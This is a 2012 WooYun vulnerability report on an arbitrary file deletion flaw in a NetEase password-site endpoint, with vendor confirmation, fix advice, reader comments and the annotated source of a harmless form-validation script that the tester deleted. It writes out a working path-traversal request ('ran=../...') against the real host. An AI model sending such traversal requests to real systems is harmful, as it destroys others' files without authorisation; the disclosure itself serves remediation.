
漏洞概要

缺陷编号:wooyun-2012-09695

漏洞标题:网易任意文件删除漏洞[严重]

相关厂商:网易

漏洞作者: 鬼哥

提交时间:2012-07-15 22:53

修复时间:2012-08-29 22:54

公开时间:2012-08-29 22:54

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]



漏洞详情

披露状态:

2012-07-15: 细节已通知厂商并且等待厂商处理中
2012-07-16: 厂商已经确认,细节仅向厂商公开
2012-07-26: 细节向核心白帽子及相关领域专家公开
2012-08-05: 细节向普通白帽子公开
2012-08-15: 细节向实习白帽子公开
2012-08-29: 细节向公众公开

简要描述:

网易任意文件删除漏洞[严重](目录穿越导致服务端删除接口可删除任意文件)

详细说明:

漏洞地址:https://mima.163.com/nie/ts_game_upload_remove.aspx?again=&ran=../nie/images/ts/&id=topImg.jpg
该删除接口把 ran 参数当作目录、id 参数当作文件名拼接成路径,且未对 ran 做规范化和目录范围校验,因此在 ran 中使用 ../ 即可跳出上传目录,删除服务进程有权限删除的任意文件(典型的目录穿越)。从请求形式看,仅凭 URL 参数就能触发删除,似乎也没有对文件归属做校验。想删哪个文件,换一下目录和文件名即可。测试时删除了 2 个文件,删除前均已备份。
以下为其中一个被删除(已备份)文件 Validator_nV2.js 的内容,它只是一个前端表单校验脚本,与服务端的缺陷本身无关:

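// Polyfill String.prototype.trim for engines that lack it (old IE). The
// native method is kept when it exists so the page does not clobber a
// correct built-in; the fallback strips leading and trailing whitespace
// with the regex the original script used.
if (typeof String.prototype.trim !== "function") {
String.prototype.trim = function() {
return this.replace(/(^\s*)|(\s*$)/g, "");
};
}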
// Client-side form validator shipped with the mima.163.com page above.
// Each key of the table below is a possible value of an element's "dataType"
// attribute. A RegExp value is tested against the trimmed field value; a
// string value is passed to eval() by Validate() inside a `with (element)`
// block, so `value` and `getAttribute(...)` in those strings resolve against
// the element being checked (the eval'd text is fixed table content, the
// attribute values only reach it as arguments).
// Depends on page globals not defined here: `$` (returns an element for an
// id, see its .style/.className uses below), `j` (a jQuery-like selector,
// only called inside try/catch) and `event` (IE-style window.event).
// NOTE(review): everything here runs in the browser and is trivially
// bypassed; it gives no protection to server endpoints such as the
// upload_remove handler in the report above. The `with`/`eval` pattern is
// flagged, not changed, to keep the listing byte-identical.
Validator = {
// ---- validation table: RegExp = tested directly, string = eval'd ----
MimaIdCard : "this.IsMimaIdCard(value)",
Pingma : "this.IsPingma(value)",
Require : /.+/, // at least one character
// Email : /^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$/,
Email : "this.IsEmail(value)",
// landline: optional (area) / area- prefix, 7-8 digit number, optional -ext
Phone : /^((\(\d{2,3}\))|(\d{3}\-))?(\(0\d{2,3}\)|0\d{2,3}-)?[1-9]\d{6,7}(\-\d{1,4})?$/,
Mobile : /^1[3458]\d{9}$/, // 11 digits starting 13/14/15/18 (2012-era prefixes)
// plain http:// only; https:// URLs are rejected by this pattern
Url : /^http:\/\/[A-Za-z0-9]+\.[A-Za-z0-9]+[\/=\?%\-&_~`@[\]\':+!]*([^<>\"\"])*$/,
IdCard : "this.IsIdCard(value)",
Currency : /^\d+(\.\d+)?$/, // unsigned decimal
Number : /^\d+$/,
Zip : /^[1-9]\d{5}$/, // 6-digit postcode, no leading zero
QQ : "this.IsQQ(value)",
Integer : /^[-\+]?\d+$/,
Double : /^[-\+]?\d+(\.\d+)?$/,
English : /^[A-Za-z]+$/,
Chinese : /^[\u0391-\uFFE5]+$/, // broad BMP range, not just CJK
Username : /^[a-z]\w{3,}$/i, // letter followed by 3+ word chars
// "unsafe" = made of a single character class only (all upper, all lower,
// all digits, all punctuation), or 5 chars or shorter, or containing whitespace
UnSafe : /^(([A-Z]*|[a-z]*|\d*|[-_\~!@#\$%\^&\*\.\(\)\[\]\{\}<>\?\\\/\'\"]*)|.{0,5})$|\s/,
// true when str does NOT match UnSafe
IsSafe : function(str) {
return !this.UnSafe.test(str);
},
SafeString : "this.IsSafe(value)",
// `accept` attribute: comma-separated list of allowed extensions
Filter : "this.DoFilter(value, getAttribute('accept'))",
// length in UTF-16 code units within [min, max]
Limit : "this.limit(value.length,getAttribute('min'), getAttribute('max'))",
// same as Limit, but an empty value always passes
Limit2 : "this.limit2(value.length, getAttribute('min'), getAttribute('max'))",
// length where each non-Latin-1 character counts as 2
LimitB : "this.limit(this.LenB(value), getAttribute('min'), getAttribute('max'))",
// NOTE(review): IsDate takes (op, formatString), so the `min` attribute is
// received as the format string here and the `format` attribute is ignored
Date : "this.IsDate(value, getAttribute('min'), getAttribute('format'))",
// must equal the value of the first element named by the `to` attribute
Repeat : "value == document.getElementsByName(getAttribute('to'))[0].value",
// exclusive bounds; value|0 truncates to a 32-bit integer
Range : "getAttribute('min') < (value|0) && (value|0) < getAttribute('max')",
Compare : "this.compare(value,getAttribute('operator'),getAttribute('to'))",
// `regexp` attribute is compiled at validation time, see Exec
Custom : "this.Exec(value, getAttribute('regexp'))",
Group : "this.MustChecked(getAttribute('name'), getAttribute('min'), getAttribute('max'))",
// slot 0 holds the form; failing elements are appended after it
ErrorItem : [ document.forms[0] ],
// slot 0 holds the header text; entries "N:msg" are appended after it
ErrorMessage : [ "以下原因导致提交失败:\t" ],
// Validates every visible element of theForm (or event.srcElement).
// mode selects how failures are shown: 4 = alert and focus, 5 = "tips"
// elements, anything else (default 1) = "xPro" elements.
// Returns false when an element failed, true otherwise. Only the first
// failing element is recorded: breakFor stops the loop at the first error.
Validate : function(theForm, mode) {
var obj = theForm || event.srcElement;
var count = obj.elements.length;
// reset the error lists, keeping slot 0 (form / header text)
this.ErrorMessage.length = 1;
this.ErrorItem.length = 1;
this.ErrorItem[0] = obj;
for ( var i = 0; i < count; i++) {
var breakFor = false;
// `with` puts the element's properties (value, getAttribute, ...) in
// scope for the eval'd table strings below
with (obj.elements[i]) {
var j_show = true;
try{
// jQuery-style visibility check; `j` may be missing, hence the try/catch
j_show = j("#"+obj.elements[i].id).is(":visible")
}catch(e){
j_show = true;
}

// hidden elements are not validated
if (obj.elements[i].style.display != 'none' && j_show) {
var _tipId = obj.elements[i].getAttribute("tipId");
if (_tipId != null) {
$(_tipId).style.display = 'none'; // hide a previous error tip
}
var _dataType = getAttribute("dataType");
// getAttribute yields null (typeof "object") when absent; also skip
// dataTypes with no table entry
if (typeof (_dataType) == "object"
|| typeof (this[_dataType]) == "undefined")
continue;
// optional fields (require="false") may stay blank
if (getAttribute("require") == "false"
&& value.trim() == "")
continue;
switch (_dataType) {
// string-valued entries: evaluated as code in the element's scope
case "MimaIdCard":
case "Pingma":
case "IdCard":
case "Email":
case "QQ":
case "Date":
case "Repeat":
case "Range":
case "Compare":
case "Custom":
case "Group":
case "Limit":
case "Limit2":
case "LimitB":
case "SafeString":
case "Filter":
if (!eval(this[_dataType])) {
this.AddError(i, getAttribute("msg"));
breakFor = true;
}
break;
default:
// RegExp-valued entries: tested against the trimmed value
if (!this[_dataType].test(value.trim())) {
this.AddError(i, getAttribute("msg"));
breakFor = true;
}
}
}
if (breakFor)
break;
}
}
if (this.ErrorMessage.length > 1) {
mode = mode || 1;
var errCount = this.ErrorItem.length;
switch (mode) {
/* ---------------------------------------- */
// mode 4: one alert with all messages, focus the first failing element
case 4:
alert(this.ErrorMessage.join("\n"));
try {
this.ErrorItem[1].focus();
} catch (e) {
}
break;
/* ---------------------------------------- */
// mode 5: switch each element's tip to its error class and show the
// message (minus the "N:" prefix) in it
case 5:
for ( var i = 1; i < errCount; i++) {
try {
var _tipId = this.ErrorItem[i].getAttribute("tipId");
if (_tipId == null) {
// this.ErrorItem[i].parentNode.style.backgroundColor
// = "red";
} else {
if ($(this.ErrorItem[i].getAttribute("tipId")).className == 'tips') {
$(this.ErrorItem[i].getAttribute("tipId")).className = 'error_tips';
} else if ($(this.ErrorItem[i]
.getAttribute("tipId")).className == 'tip4textarea') {
$(this.ErrorItem[i].getAttribute("tipId")).className = 'error_tip4textarea';
}
// NOTE(review): written with innerHTML; the text comes from the
// element's `msg` attribute, i.e. page markup, not user input
if (this.ErrorMessage[i] != "") {
$(this.ErrorItem[i].getAttribute("tipId")).innerHTML = this.ErrorMessage[i]
.replace(/\d+:/, "");
}
if (this.ErrorItem[i].getAttribute("tipId") == 'tip2') {
$(this.ErrorItem[i].getAttribute("tipId")).style.margin = '0px';
}
$(this.ErrorItem[i].getAttribute("tipId")).style.display = 'block';
}
} catch (e) {
alert(e.description + " 5 ");
}
}
if (this.ErrorItem[1].getAttribute("fId") == null) {
// this.ErrorItem[1].focus();
} else {
// alert(this.ErrorItem[1].getAttribute("fId"));
// $(this.ErrorItem[1].getAttribute("fId")).focus();
}
break;
/* ---------------------------------------- */
// default: "xPro" tips become "xProerr", the grandparent gets 'prompt'
default:
for ( var i = 1; i < errCount; i++) {
try {
var _tipId = this.ErrorItem[i].getAttribute("tipId");
if (_tipId != null) {
if ($(_tipId).className == 'xPro') {
$(_tipId).className = 'xProerr';
$(_tipId).style.display = "";
$(_tipId).parentNode.parentNode.className = 'prompt';
} else if ($(this.ErrorItem[i]
.getAttribute("tipId")).className == 'tip4textarea') {
$(this.ErrorItem[i].getAttribute("tipId")).className = 'error_tip4textarea';
}
}
} catch (e) {
alert(e.description + " 6 ");
}
}
}
return false;
}
return true;
},
// true when min <= len <= max; a falsy min/max (including 0) falls back to
// 0 / Number.MAX_VALUE
limit : function(len, min, max) {
min = min || 0;
max = max || Number.MAX_VALUE;
return min <= len && len <= max;
},
// like limit(), but a zero length always passes
limit2 : function(len, min, max) {
if (len == 0)
return true;
min = min || 0;
max = max || Number.MAX_VALUE;
return min <= len && len <= max;
},
// "byte" length: every character outside \x00-\xff counts as two
LenB : function(str) {
return str.replace(/[^\x00-\xff]/g, "**").length;
},
// records the failing element (by index into the form) and its message,
// prefixed with the message's position in the list ("N:")
AddError : function(index, str) {
this.ErrorItem[this.ErrorItem.length] = this.ErrorItem[0].elements[index];
this.ErrorMessage[this.ErrorMessage.length] = this.ErrorMessage.length
+ ":" + str;
},
// compiles reg (a pattern string from the `regexp` attribute) and tests
// op; a fresh RegExp per call, so the "g" flag's lastIndex cannot leak
Exec : function(op, reg) {
return new RegExp(reg, "g").test(op);
},
// compares op1 and op2 as-is (both come from the DOM as strings, so the
// ordering operators compare lexicographically); unknown operator = equality
compare : function(op1, operator, op2) {
switch (operator) {
case "NotEqual":
return (op1 != op2);
case "GreaterThan":
return (op1 > op2);
case "GreaterThanEqual":
return (op1 >= op2);
case "LessThan":
return (op1 < op2);
case "LessThanEqual":
return (op1 <= op2);
default:
return (op1 == op2);
}
},
// counts checked elements sharing `name`; min defaults to 1, max to the
// group size
MustChecked : function(name, min, max) {
var groups = document.getElementsByName(name);
var hasChecked = 0;
min = min || 1;
max = max || groups.length;
for ( var i = groups.length - 1; i >= 0; i--)
if (groups[i].checked)
hasChecked++;
return min <= hasChecked && hasChecked <= max;
},
// extension check: filter is "jpg, png, ..."; builds ^.+.(?=jpg|png)(jpg|png)$
// NOTE(review): "\." inside a JS string is just ".", so the dot before the
// extension is unescaped and matches any character (e.g. "xajpg" passes)
DoFilter : function(input, filter) {
return new RegExp("^.+\.(?=EXT)(EXT)$".replace(/EXT/g, filter.split(
/\s*,\s*/).join("|")), "gi").test(input);
},
// empty passes; otherwise 1-16 digits with no leading zero
IsQQ : function(number) {
if (number.trim() == '') {
return true;
}
return /^[1-9]\d{0,15}$/.test(number.trim());
},
// only rejects an empty/blank value; the repeated-digit rule is disabled
IsMimaIdCard : function(number) {
if (!number || number.trim() == '') {
return false;
}
// reject 7 identical consecutive digits (currently disabled)
// return !(/(.)\1{6}/.test(number.trim()));
return true;
},
// empty passes; otherwise length must be 6..16 (no character-class check)
// NOTE(review): min and max are assigned without `var` and leak to the
// global scope
IsPingma : function(number) {
/* if (number || number != '') {
return (/^[0-9a-zA-Z\\._]{6,16}$/.test(number));
}
return true;
*/
number = number.trim();
if (number == '') {
return true;
}else{
min = 6;
max = 16;
return min <= number.length && number.length <= max;
}
},
IsEmail : function(value) {
return (/^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$/.test(value));
},
// Chinese resident ID number: 15 digits (old format, 2-digit year) or
// 18 characters (4-digit year, last char is a check digit 0-9 or x).
// The first two digits must map to a named entry of `area`.
// 15-digit numbers are accepted without a check digit; 18-digit numbers
// must match the recomputed value (so an uppercase "X" check digit is
// rejected, since `verify` holds lowercase "x").
IsIdCard : function(number) {
var date, Ai;
var verify = "10x98765432"; // check digit indexed by weighted sum % 11
var Wi = [ 7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2 ];
// province/region names indexed by the first two digits; '' = unassigned
var area = [ '', '', '', '', '', '', '', '', '', '', '', '北京', '天津',
'河北', '山西', '内蒙古', '', '', '', '', '', '辽宁', '吉林', '黑龙江', '',
'', '', '', '', '', '', '上海', '江苏', '浙江', '安微', '福建', '江西',
'山东', '', '', '', '河南', '湖北', '湖南', '广东', '广西', '海南', '', '',
'', '重庆', '四川', '贵州', '云南', '西藏', '', '', '', '', '', '', '陕西',
'甘肃', '青海', '宁夏', '新疆', '', '', '', '', '', '台湾', '', '', '',
'', '', '', '', '', '', '香港', '澳门', '', '', '', '', '', '', '',
'', '国外' ];
// groups: 1 = province, 4-6 = yy/mm/dd (15-digit), 9-11 = yyyy/mm/dd (18-digit)
var re = number
.match(/^(\d{2})\d{4}(((\d{2})(\d{2})(\d{2})(\d{3}))|((\d{4})(\d{2})(\d{2})(\d{3}[x\d])))$/i);
if (re == null)
return false;
if (re[1] >= area.length || area[re[1]] == "")
return false;
if (re[2].length == 12) {
// 18-digit: first 17 chars are the payload
Ai = number.substr(0, 17);
date = [ re[9], re[10], re[11] ].join("-");
} else {
// 15-digit: expand the 2-digit year with "19" to get a 17-char payload
Ai = number.substr(0, 6) + "19" + number.substr(6);
date = [ "19" + re[4], re[5], re[6] ].join("-");
}
if (!this.IsDate(date, "ymd"))
return false;
var sum = 0;
for ( var i = 0; i <= 16; i++) {
sum += Ai.charAt(i) * Wi[i];
}
Ai += verify.charAt(sum % 11);
return (number.length == 15 || number.length == 18 && number == Ai);
},
// validates a date string in "ymd" (default) or "dmy" order with a
// single separator from - . /, 2- or 4-digit year; 2-digit years map via
// GetFullYear. Returns false for an unknown formatString. Round-trips
// through Date() so out-of-range days (e.g. 02-30) are rejected.
IsDate : function(op, formatString) {
formatString = formatString || "ymd";
var m, year, month, day;
switch (formatString) {
case "ymd":
m = op.match(new RegExp(
"^((\\d{4})|(\\d{2}))([-./])(\\d{1,2})\\4(\\d{1,2})$"));
if (m == null)
return false;
day = m[6];
month = m[5] * 1;
year = (m[2].length == 4) ? m[2] : GetFullYear(parseInt(m[3], 10));
break;
case "dmy":
m = op.match(new RegExp(
"^(\\d{1,2})([-./])(\\d{1,2})\\2((\\d{4})|(\\d{2}))$"));
if (m == null)
return false;
day = m[1];
month = m[3] * 1;
year = (m[5].length == 4) ? m[5] : GetFullYear(parseInt(m[6], 10));
break;
default:
break;
}
// month 0 (or unset, for an unknown format) fails here, so the
// `month == 0 ? 12` mapping below is never reached
if (!parseInt(month))
return false;
month = month == 0 ? 12 : month;
var date = new Date(year, month - 1, day);
// loose == on purpose: year/day may still be strings at this point
return (typeof (date) == "object" && year == date.getFullYear()
&& month == (date.getMonth() + 1) && day == date.getDate());
// 2-digit year: 00-29 -> 20xx, 30-99 -> 19xx (hoisted declaration)
function GetFullYear(y) {
return ((y < 30 ? "20" : "19") + y) | 0;
}
}
}


被删除(已备份)的另一个文件是一张图片,即上面请求中 id 参数所指的文件:
topImg.jpg

漏洞证明:

漏洞地址:https://mima.163.com/nie/ts_game_upload_remove.aspx?again=&ran=../nie/images/ts/&id=topImg.jpg

修复方案:

服务端修复建议:(1)不要让客户端指定目录——把 ran 这类参数改为服务端维护的上传记录 ID,由服务端映射到真实路径;(2)若必须接收路径,先对 ran 与 id 做规范化(解析为绝对路径后)再校验其必须位于预期的上传根目录之内,拒绝含 ../、绝对路径、空字节等形式的值,id 只允许纯文件名、不允许目录分隔符;(3)删除前校验当前登录用户对该文件的归属/权限,并记录审计日志。前端脚本(如上面的 Validator_nV2.js)只做表单校验,不能替代以上服务端检查。

版权声明:转载请注明来源 鬼哥@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2012-07-16 17:20

厂商回复:

感谢您对网易的关注,漏洞已修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2012-07-15 22:58 | zhk ( 普通白帽子 | Rank:436 漏洞数:70 | 先看公告~)

    以后要再标题前加:【精华】

  2. 2012-07-15 23:10 | 瓜瓜 ( 普通白帽子 | Rank:173 漏洞数:25 )

    +1

  3. 2012-07-15 23:39 | 猥琐 ( 路人 | Rank:6 漏洞数:2 | 学习什么的最重要!)

    这个厉害

  4. 2012-07-16 00:40 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    删谁的?

  5. 2012-07-16 09:45 | 凤凰 ( 路人 | Rank:15 漏洞数:6 | 涅磐)

    @鬼哥 建议标题改为网易任意文件删除漏洞

  6. 2012-07-16 09:57 | Rona ( 实习白帽子 | Rank:88 漏洞数:23 | test)

    求详情

  7. 2012-07-16 10:43 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @凤凰 对头。任意文件这个描述更好。差点把这位凤凰误认为凤凰网···

  8. 2012-07-16 13:17 | 鬼哥 ( 普通白帽子 | Rank:136 漏洞数:13 | 鬼哥 !!!!)

    @凤凰 写错字了。本来是想这样写的。

  9. 2012-08-16 01:27 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    说真的。。测试的时候真没想过去备份。。洞主v5